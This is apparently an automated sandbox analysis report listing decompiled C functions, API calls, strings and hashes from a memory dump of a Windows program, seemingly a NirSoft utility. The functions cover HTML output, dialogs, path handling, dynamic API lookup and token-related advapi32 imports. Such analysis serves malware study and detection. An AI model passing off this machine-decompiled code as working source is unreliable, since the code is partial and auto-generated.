                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                                                          • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                                                                                                                          • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                                                                                                          			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                                                                                                                                          0x00409faf
                                                                                                                                                                                                                          0x00409fb4
                                                                                                                                                                                                                          0x00409fb5
                                                                                                                                                                                                                          0x00409fb6
                                                                                                                                                                                                                          0x0040a043
                                                                                                                                                                                                                          0x0040a04a
                                                                                                                                                                                                                          0x0040a058
                                                                                                                                                                                                                          0x0040a05f
                                                                                                                                                                                                                          0x0040a06d
                                                                                                                                                                                                                          0x0040a074
                                                                                                                                                                                                                          0x0040a08e
                                                                                                                                                                                                                          0x0040a099
                                                                                                                                                                                                                          0x0040a0ab
                                                                                                                                                                                                                          0x0040a0c9
                                                                                                                                                                                                                          0x0040a0ce
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040a0ce
                                                                                                                                                                                                                          0x00409fc3
                                                                                                                                                                                                                          0x00409fca
                                                                                                                                                                                                                          0x00409fd8
                                                                                                                                                                                                                          0x00409fdf
                                                                                                                                                                                                                          0x00409ff9
                                                                                                                                                                                                                          0x0040a006
                                                                                                                                                                                                                          0x0040a018
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                                          • String ID: %%0.%df
                                                                                                                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                                                                                                                          • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                                                                                                                          • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                                          			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                                                                                                                                          0x00406216
                                                                                                                                                                                                                          0x0040621b
                                                                                                                                                                                                                          0x00406222
                                                                                                                                                                                                                          0x0040625f
                                                                                                                                                                                                                          0x00406263
                                                                                                                                                                                                                          0x00406269
                                                                                                                                                                                                                          0x00406271
                                                                                                                                                                                                                          0x00406273
                                                                                                                                                                                                                          0x00406289
                                                                                                                                                                                                                          0x00406289
                                                                                                                                                                                                                          0x0040628e
                                                                                                                                                                                                                          0x0040628f
                                                                                                                                                                                                                          0x004062a9
                                                                                                                                                                                                                          0x004062ab
                                                                                                                                                                                                                          0x004062ad
                                                                                                                                                                                                                          0x004062b0
                                                                                                                                                                                                                          0x004062c3
                                                                                                                                                                                                                          0x004062c3
                                                                                                                                                                                                                          0x004062d3
                                                                                                                                                                                                                          0x004062da
                                                                                                                                                                                                                          0x004062f1
                                                                                                                                                                                                                          0x004062f7
                                                                                                                                                                                                                          0x004062fe
                                                                                                                                                                                                                          0x0040630d
                                                                                                                                                                                                                          0x00406312
                                                                                                                                                                                                                          0x0040631e
                                                                                                                                                                                                                          0x00406327
                                                                                                                                                                                                                          0x00406275
                                                                                                                                                                                                                          0x00406283
                                                                                                                                                                                                                          0x00406283
                                                                                                                                                                                                                          0x00406285
                                                                                                                                                                                                                          0x00406287
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00406277
                                                                                                                                                                                                                          0x0040627a
                                                                                                                                                                                                                          0x00406280
                                                                                                                                                                                                                          0x00406280
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00406280
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040627a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00406283
                                                                                                                                                                                                                          0x00406273
                                                                                                                                                                                                                          0x00406224
                                                                                                                                                                                                                          0x00406224
                                                                                                                                                                                                                          0x00406229
                                                                                                                                                                                                                          0x0040622a
                                                                                                                                                                                                                          0x0040622f
                                                                                                                                                                                                                          0x00406236
                                                                                                                                                                                                                          0x0040623c
                                                                                                                                                                                                                          0x00406243
                                                                                                                                                                                                                          0x00406245
                                                                                                                                                                                                                          0x00406247
                                                                                                                                                                                                                          0x00406248
                                                                                                                                                                                                                          0x0040624b
                                                                                                                                                                                                                          0x00406254
                                                                                                                                                                                                                          0x00406254
                                                                                                                                                                                                                          0x0040632d
                                                                                                                                                                                                                          0x00406334

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadMenuW.USER32 ref: 00406236
                                                                                                                                                                                                                            • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                                                                                                                            • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                                                                                                                            • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                                                                                                                            • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                                                                                                                          • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                                                                                                                          • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004062DA
                                                                                                                                                                                                                          • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                                                                                                                          • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                                                                                                                          • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                                                                                                                            • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                                                                                                                          • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                                                                                                                          • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                                                          			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                                                                                                                                          0x004081e4
                                                                                                                                                                                                                          0x004081ec
                                                                                                                                                                                                                          0x004081fc
                                                                                                                                                                                                                          0x00408200
                                                                                                                                                                                                                          0x00408215
                                                                                                                                                                                                                          0x0040821c
                                                                                                                                                                                                                          0x0040822a
                                                                                                                                                                                                                          0x00408231
                                                                                                                                                                                                                          0x0040823f
                                                                                                                                                                                                                          0x00408246
                                                                                                                                                                                                                          0x0040824b
                                                                                                                                                                                                                          0x0040824e
                                                                                                                                                                                                                          0x0040825a
                                                                                                                                                                                                                          0x0040825c
                                                                                                                                                                                                                          0x00408261
                                                                                                                                                                                                                          0x0040826c
                                                                                                                                                                                                                          0x0040826d
                                                                                                                                                                                                                          0x0040826e
                                                                                                                                                                                                                          0x00408273
                                                                                                                                                                                                                          0x00408273
                                                                                                                                                                                                                          0x00408276
                                                                                                                                                                                                                          0x0040827c
                                                                                                                                                                                                                          0x0040828a
                                                                                                                                                                                                                          0x00408290
                                                                                                                                                                                                                          0x004082ab
                                                                                                                                                                                                                          0x004082c5
                                                                                                                                                                                                                          0x004082c6
                                                                                                                                                                                                                          0x004082d1
                                                                                                                                                                                                                          0x004082d2
                                                                                                                                                                                                                          0x004082d3
                                                                                                                                                                                                                          0x004082e7
                                                                                                                                                                                                                          0x004082ec
                                                                                                                                                                                                                          0x004082f0
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004082f5
                                                                                                                                                                                                                          0x004082fe

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                          • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                                                                                                                          • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                          			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                                                                                                                          0x0040920a
                                                                                                                                                                                                                          0x00409218
                                                                                                                                                                                                                          0x00409223
                                                                                                                                                                                                                          0x0040922c
                                                                                                                                                                                                                          0x0040924b
                                                                                                                                                                                                                          0x00409253
                                                                                                                                                                                                                          0x0040929b
                                                                                                                                                                                                                          0x004092e4
                                                                                                                                                                                                                          0x0040929d
                                                                                                                                                                                                                          0x004092a3
                                                                                                                                                                                                                          0x004092b1
                                                                                                                                                                                                                          0x004092bd
                                                                                                                                                                                                                          0x004092cc
                                                                                                                                                                                                                          0x004092d1
                                                                                                                                                                                                                          0x004092d8
                                                                                                                                                                                                                          0x004092dd
                                                                                                                                                                                                                          0x00409255
                                                                                                                                                                                                                          0x0040925b
                                                                                                                                                                                                                          0x00409269
                                                                                                                                                                                                                          0x00409275
                                                                                                                                                                                                                          0x00409282
                                                                                                                                                                                                                          0x0040928d
                                                                                                                                                                                                                          0x00409292
                                                                                                                                                                                                                          0x004092ec
                                                                                                                                                                                                                          0x004092ef
                                                                                                                                                                                                                          0x004092ef
                                                                                                                                                                                                                          0x00409231
                                                                                                                                                                                                                          0x00409232
                                                                                                                                                                                                                          0x00409233
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409239
                                                                                                                                                                                                                          0x0040921a
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00409223
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00409233
                                                                                                                                                                                                                            • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                                                                                                                            • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                                                                                                                            • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00409282
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040928D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409269
                                                                                                                                                                                                                            • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                                                                                                                            • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004092B1
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004092CC
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 004092D8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                          • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                                                                                                                          • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                                                          			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                                                                                                                                                          0x00409c73
                                                                                                                                                                                                                          0x00409c7c
                                                                                                                                                                                                                          0x00409c90
                                                                                                                                                                                                                          0x00409c9f
                                                                                                                                                                                                                          0x00409ca2
                                                                                                                                                                                                                          0x00409ca7
                                                                                                                                                                                                                          0x00409ca9
                                                                                                                                                                                                                          0x00409cb1
                                                                                                                                                                                                                          0x00409cc0
                                                                                                                                                                                                                          0x00409cc2
                                                                                                                                                                                                                          0x00409cc7
                                                                                                                                                                                                                          0x00409ccf
                                                                                                                                                                                                                          0x00409cd0
                                                                                                                                                                                                                          0x00409cd7
                                                                                                                                                                                                                          0x00409cd8
                                                                                                                                                                                                                          0x00409cd9
                                                                                                                                                                                                                          0x00409cda
                                                                                                                                                                                                                          0x00409cdc
                                                                                                                                                                                                                          0x00409ce0
                                                                                                                                                                                                                          0x00409ce1
                                                                                                                                                                                                                          0x00409ce9
                                                                                                                                                                                                                          0x00409cf1
                                                                                                                                                                                                                          0x00409cfb
                                                                                                                                                                                                                          0x00409d08
                                                                                                                                                                                                                          0x00409d08
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409d0d
                                                                                                                                                                                                                          0x00409d0f

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00409CE4
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00409CF1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcstrlen
                                                                                                                                                                                                                          • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 1027343248-2054640941
                                                                                                                                                                                                                          • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                                                                                                                          • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                                                                                                                                                          0x004028a3
                                                                                                                                                                                                                          0x004028ab
                                                                                                                                                                                                                          0x004028bd
                                                                                                                                                                                                                          0x004028ca
                                                                                                                                                                                                                          0x004028d7
                                                                                                                                                                                                                          0x004028e3
                                                                                                                                                                                                                          0x004028e6
                                                                                                                                                                                                                          0x004028e8
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004028eb
                                                                                                                                                                                                                          0x004028ec

                                                                                                                                                                                                                          APIs
